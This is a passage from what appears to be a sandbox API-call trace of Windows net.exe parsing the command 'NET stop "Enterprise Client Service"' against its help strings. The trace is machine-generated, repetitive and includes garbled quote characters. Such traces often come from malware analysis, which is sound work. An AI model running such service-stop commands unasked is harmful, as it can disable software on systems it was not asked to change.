(hMem=0x463f78) returned 0x0 [0211.602] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0xf [0211.602] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client ServiceΓÇ¥", _String2="NET START UPS\r\n", _MaxCount=0x28) returned 14 [0211.602] LocalFree (hMem=0x463f78) returned 0x0 [0211.602] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x17 [0211.602] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client ServiceΓÇ¥", _String2="NET START WORKSTATION\r\n", _MaxCount=0x28) returned 14 [0211.602] LocalFree (hMem=0x463f78) returned 0x0 [0211.602] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x18 [0211.602] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client ServiceΓÇ¥", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x28) returned 14 [0211.602] LocalFree (hMem=0x463f78) returned 0x0 [0211.602] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x2a [0211.602] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client ServiceΓÇ¥", _String2="NET STATISTICS\r\n[WORKSTATION | SERVER]\r\n", _MaxCount=0x28) returned 14 [0211.602] LocalFree (hMem=0x463f78) returned 0x0 [0211.602] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x15 [0211.602] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client ServiceΓÇ¥", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x28) returned 19 [0211.602] LocalFree (hMem=0x463f78) returned 0x0 [0211.602] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="塨F⡋瓢\x0e㽸F\x0e") returned 0x58 [0211.602] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client ServiceΓÇ¥", _String2="NET TIME\r\n\r\n[\\\\computername | /DOMAIN[:d", _MaxCount=0x28) returned -1 [0211.602] LocalFree (hMem=0x465868) returned 0x0 [0211.602] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="塨F⡋瓢\x0e塨F\x0e") returned 0x184 [0211.602] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client ServiceΓÇ¥", _String2="NET USE\r\n[devicename | *] [\\\\computernam", _MaxCount=0x28) returned -2 [0211.602] LocalFree (hMem=0x465868) returned 0x0 [0211.602] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="塨F⡋瓢\x0e塨F\x0e") returned 0xc7 [0211.602] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client ServiceΓÇ¥", _String2="NET USER\r\n[username [password | *] [opti", _MaxCount=0x28) returned -2 [0211.602] LocalFree (hMem=0x465868) returned 0x0 [0211.602] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="塨F⡋瓢\x0e塨F\x0e") returned 0x47 [0211.602] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client ServiceΓÇ¥", _String2="NET VIEW\r\n[\\\\computername [/CACHE] | [/A", _MaxCount=0x28) returned -3 [0211.602] LocalFree (hMem=0x465868) returned 0x0 [0211.602] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="塨F⡋瓢\x0e塨F\x0e") returned 0xc2 [0211.602] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client ServiceΓÇ¥", _String2="NET\r\n [ ACCOUNTS | COMPUTER | CONFIG ", _MaxCount=0x28) returned 19 [0211.602] LocalFree (hMem=0x465868) returned 0x0 [0211.602] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="塨F⡋瓢\x0e塨F\x0e") returned 0x319 [0211.602] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client ServiceΓÇ¥", _String2="SERVICES\r\nNET START can be used to start", _MaxCount=0x28) returned -5 [0211.602] LocalFree (hMem=0x465868) returned 0x0 [0211.602] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="塨F⡋瓢\x0e塨F\x0e") returned 0x483 [0211.602] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client ServiceΓÇ¥", _String2="SYNTAX\r\nThe following conventions are us", _MaxCount=0x28) returned -5 [0211.602] LocalFree (hMem=0x465868) returned 0x0 [0211.603] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="塨F⡋瓢\x0e塨F\x0e") returned 0xa86 [0211.603] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client ServiceΓÇ¥", _String2="NAMES\r\nThe following types of names are ", _MaxCount=0x28) returned 4 [0211.603] LocalFree (hMem=0x465868) returned 0x0 [0211.603] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="塨F⡋瓢\x0e塨F\x0e") returned 0x54 [0211.603] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client ServiceΓÇ¥", _String2="\r\nFor more information on tools see the ", _MaxCount=0x28) returned 97 [0211.603] LocalFree (hMem=0x465868) returned 0x0 [0211.603] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="塨F⡋瓢\x0e塨F\x0e") returned 0xad [0211.603] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client", _String2="NET ACCOUNTS\r\n[/FORCELOGOFF:{", _MaxCount=0x1d) returned 18 [0211.603] LocalFree (hMem=0x465868) returned 0x0 [0211.603] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e塨F\x0e") returned 0x2e [0211.603] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client", _String2="NET COMPUTER\r\n\\\\computername ", _MaxCount=0x1d) returned 16 [0211.603] LocalFree (hMem=0x463f78) returned 0x0 [0211.603] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="塨F⡋瓢\x0e㽸F\x0e") returned 0x7d [0211.603] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client", _String2="NET CONFIG SERVER\r\n[/AUTODISC", _MaxCount=0x1d) returned 16 [0211.603] LocalFree (hMem=0x465868) returned 0x0 [0211.603] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e塨F\x0e") returned 0x26 [0211.603] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client", _String2="NET CONFIG\r\n[SERVER | WORKSTA", _MaxCount=0x1d) returned 16 [0211.603] LocalFree (hMem=0x463f78) returned 0x0 [0211.603] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x19 [0211.603] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client", _String2="NET CONTINUE\r\nservice\r\n\r\n", _MaxCount=0x1d) returned 16 [0211.603] LocalFree (hMem=0x463f78) returned 0x0 [0211.603] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x1b [0211.603] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client", _String2="NET FILE\r\n[id [/CLOSE]]\r\n\r\n", _MaxCount=0x1d) returned 13 [0211.603] LocalFree (hMem=0x463f78) returned 0x0 [0211.603] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="塨F⡋瓢\x0e㽸F\x0e") returned 0xbe [0211.603] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client", _String2="NET GROUP\r\n[groupname [/COMME", _MaxCount=0x1d) returned 12 [0211.604] LocalFree (hMem=0x465868) returned 0x0 [0211.604] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e塨F\x0e") returned 0x33 [0211.604] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client", _String2="NET HELP\r\ncommand\r\n -or-\r", _MaxCount=0x1d) returned 11 [0211.604] LocalFree (hMem=0x463f78) returned 0x0 [0211.604] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x19 [0211.604] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client", _String2="NET HELPMSG\r\nmessage#\r\n\r\n", _MaxCount=0x1d) returned 11 [0211.604] LocalFree (hMem=0x463f78) returned 0x0 [0211.604] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="塨F⡋瓢\x0e㽸F\x0e") returned 0xc1 [0211.604] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client", _String2="NET LOCALGROUP\r\n[groupname [/", _MaxCount=0x1d) returned 7 [0211.604] LocalFree (hMem=0x465868) returned 0x0 [0211.604] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e塨F\x0e") returned 0x16 [0211.604] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x1d) returned 3 [0211.604] LocalFree (hMem=0x463f78) returned 0x0 [0211.604] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x33 [0211.604] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client", _String2="NET SESSION\r\n[\\\\computername]", _MaxCount=0x1d) returned 15 [0211.604] LocalFree (hMem=0x463f78) returned 0x0 [0211.604] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc20, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="塨F⡋瓢\x0e㽸F\x0e") returned 0x234 [0211.604] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client", _String2="NET SHARE\r\nsharename\r\n ", _MaxCount=0x1d) returned 12 [0211.604] LocalFree (hMem=0x465868) returned 0x0 [0211.604] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc23, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e塨F\x0e") returned 0x13 [0211.604] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client", _String2="NET START BROWSER\r\n", _MaxCount=0x1d) returned 14 [0211.604] LocalFree (hMem=0x463f78) returned 0x0 [0211.604] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc26, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x14 [0211.604] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client", _String2="NET START CLIPBOOK\r\n", _MaxCount=0x1d) returned 14 [0211.604] LocalFree (hMem=0x463f78) returned 0x0 [0211.604] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc29, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x14 [0211.604] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client", _String2="NET START EVENTLOG\r\n", _MaxCount=0x1d) returned 14 [0211.604] LocalFree (hMem=0x463f78) returned 0x0 [0211.604] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc2c, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x15 [0211.604] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client", _String2="NET START MESSENGER\r\n", _MaxCount=0x1d) returned 14 [0211.604] LocalFree (hMem=0x463f78) returned 0x0 [0211.604] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc2f, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x15 [0211.604] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client", _String2="NET START NET LOGON\r\n", _MaxCount=0x1d) returned 14 [0211.604] LocalFree (hMem=0x463f78) returned 0x0 [0211.604] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc32, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x16 [0211.604] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client", _String2="NET START RPCLOCATOR\r\n", _MaxCount=0x1d) returned 14 [0211.605] LocalFree (hMem=0x463f78) returned 0x0 [0211.605] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc35, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x11 [0211.605] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client", _String2="NET START RPCSS\r\n", _MaxCount=0x1d) returned 14 [0211.605] LocalFree (hMem=0x463f78) returned 0x0 [0211.605] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc38, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x14 [0211.605] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client", _String2="NET START SCHEDULE\r\n", _MaxCount=0x1d) returned 14 [0211.605] LocalFree (hMem=0x463f78) returned 0x0 [0211.605] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc3b, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x12 [0211.605] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client", _String2="NET START SERVER\r\n", _MaxCount=0x1d) returned 14 [0211.605] LocalFree (hMem=0x463f78) returned 0x0 [0211.605] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc3e, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0xf [0211.605] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client", _String2="NET START UPS\r\n", _MaxCount=0x1d) returned 14 [0211.605] LocalFree (hMem=0x463f78) returned 0x0 [0211.605] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc41, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x17 [0211.605] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client", _String2="NET START WORKSTATION\r\n", _MaxCount=0x1d) returned 14 [0211.605] LocalFree (hMem=0x463f78) returned 0x0 [0211.605] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc44, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x18 [0211.605] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client", _String2="NET START\r\n[service]\r\n\r\n", _MaxCount=0x1d) returned 14 [0211.605] LocalFree (hMem=0x463f78) returned 0x0 [0211.605] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc47, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x2a [0211.605] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client", _String2="NET STATISTICS\r\n[WORKSTATION ", _MaxCount=0x1d) returned 14 [0211.605] LocalFree (hMem=0x463f78) returned 0x0 [0211.605] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc4a, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x15 [0211.605] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client", _String2="NET STOP\r\nservice\r\n\r\n", _MaxCount=0x1d) returned 19 [0211.605] LocalFree (hMem=0x463f78) returned 0x0 [0211.605] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc4d, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="塨F⡋瓢\x0e㽸F\x0e") returned 0x58 [0211.605] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client", _String2="NET TIME\r\n\r\n[\\\\computername |", _MaxCount=0x1d) returned -1 [0211.605] LocalFree (hMem=0x465868) returned 0x0 [0211.605] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc50, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="塨F⡋瓢\x0e塨F\x0e") returned 0x184 [0211.605] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client", _String2="NET USE\r\n[devicename | *] [\\\\", _MaxCount=0x1d) returned -2 [0211.605] LocalFree (hMem=0x465868) returned 0x0 [0211.605] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc53, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="塨F⡋瓢\x0e塨F\x0e") returned 0xc7 [0211.605] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client", _String2="NET USER\r\n[username [password", _MaxCount=0x1d) returned -2 [0211.605] LocalFree (hMem=0x465868) returned 0x0 [0211.605] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc56, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="塨F⡋瓢\x0e塨F\x0e") returned 0x47 [0211.605] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client", _String2="NET VIEW\r\n[\\\\computername [/C", _MaxCount=0x1d) returned -3 [0211.606] LocalFree (hMem=0x465868) returned 0x0 [0211.606] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc59, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="塨F⡋瓢\x0e塨F\x0e") returned 0xc2 [0211.606] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client", _String2="NET\r\n [ ACCOUNTS | COMPUTE", _MaxCount=0x1d) returned 19 [0211.606] LocalFree (hMem=0x465868) returned 0x0 [0211.606] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc5c, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="塨F⡋瓢\x0e塨F\x0e") returned 0x319 [0211.606] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client", _String2="SERVICES\r\nNET START can be us", _MaxCount=0x1d) returned -5 [0211.606] LocalFree (hMem=0x465868) returned 0x0 [0211.606] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc5f, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="塨F⡋瓢\x0e塨F\x0e") returned 0x483 [0211.606] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client", _String2="SYNTAX\r\nThe following convent", _MaxCount=0x1d) returned -5 [0211.606] LocalFree (hMem=0x465868) returned 0x0 [0211.606] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc62, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="塨F⡋瓢\x0e塨F\x0e") returned 0xa86 [0211.606] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client", _String2="NAMES\r\nThe following types of", _MaxCount=0x1d) returned 4 [0211.606] LocalFree (hMem=0x465868) returned 0x0 [0211.606] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc65, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="塨F⡋瓢\x0e塨F\x0e") returned 0x54 [0211.606] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise Client", _String2="\r\nFor more information on too", _MaxCount=0x1d) returned 97 [0211.606] LocalFree (hMem=0x465868) returned 0x0 [0211.606] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xbfc, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="塨F⡋瓢\x0e塨F\x0e") returned 0xad [0211.606] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise", _String2="NET ACCOUNTS\r\n[/FORCEL", _MaxCount=0x16) returned 18 [0211.606] LocalFree (hMem=0x465868) returned 0x0 [0211.606] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xbff, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e塨F\x0e") returned 0x2e [0211.606] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise", _String2="NET COMPUTER\r\n\\\\comput", _MaxCount=0x16) returned 16 [0211.606] LocalFree (hMem=0x463f78) returned 0x0 [0211.606] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc02, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="塨F⡋瓢\x0e㽸F\x0e") returned 0x7d [0211.606] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise", _String2="NET CONFIG SERVER\r\n[/A", _MaxCount=0x16) returned 16 [0211.606] LocalFree (hMem=0x465868) returned 0x0 [0211.606] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc05, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e塨F\x0e") returned 0x26 [0211.606] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise", _String2="NET CONFIG\r\n[SERVER | ", _MaxCount=0x16) returned 16 [0211.606] LocalFree (hMem=0x463f78) returned 0x0 [0211.606] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc08, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x19 [0211.606] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise", _String2="NET CONTINUE\r\nservice\r", _MaxCount=0x16) returned 16 [0211.606] LocalFree (hMem=0x463f78) returned 0x0 [0211.606] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc0b, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x1b [0211.606] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise", _String2="NET FILE\r\n[id [/CLOSE]", _MaxCount=0x16) returned 13 [0211.606] LocalFree (hMem=0x463f78) returned 0x0 [0211.606] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc0e, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="塨F⡋瓢\x0e㽸F\x0e") returned 0xbe [0211.607] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise", _String2="NET GROUP\r\n[groupname ", _MaxCount=0x16) returned 12 [0211.607] LocalFree (hMem=0x465868) returned 0x0 [0211.607] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc11, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e塨F\x0e") returned 0x33 [0211.607] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise", _String2="NET HELP\r\ncommand\r\n ", _MaxCount=0x16) returned 11 [0211.607] LocalFree (hMem=0x463f78) returned 0x0 [0211.607] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc14, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x19 [0211.607] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise", _String2="NET HELPMSG\r\nmessage#\r", _MaxCount=0x16) returned 11 [0211.607] LocalFree (hMem=0x463f78) returned 0x0 [0211.607] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc17, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="塨F⡋瓢\x0e㽸F\x0e") returned 0xc1 [0211.607] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise", _String2="NET LOCALGROUP\r\n[group", _MaxCount=0x16) returned 7 [0211.607] LocalFree (hMem=0x465868) returned 0x0 [0211.607] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc1a, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e塨F\x0e") returned 0x16 [0211.607] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise", _String2="NET PAUSE\r\nservice\r\n\r\n", _MaxCount=0x16) returned 3 [0211.607] LocalFree (hMem=0x463f78) returned 0x0 [0211.607] FormatMessageW (in: dwFlags=0x1900, lpSource=0x74a00000, dwMessageId=0xc1d, dwLanguageId=0x0, lpBuffer=0xef488, nSize=0x0, Arguments=0xef484 | out: lpBuffer="㽸F⡋瓢\x0e㽸F\x0e") returned 0x33 [0211.607] _wcsnicmp (_String1="NET stop ΓÇ£Enterprise", _String2="NET SESSION\r\n[\\\\comput", _MaxCount=0x16) returned 15 [0211.607] LocalFree (hMem=0x463f78) returned 0x0 [0211.607] FormatMessageW (in: dwFlags=0x1900, 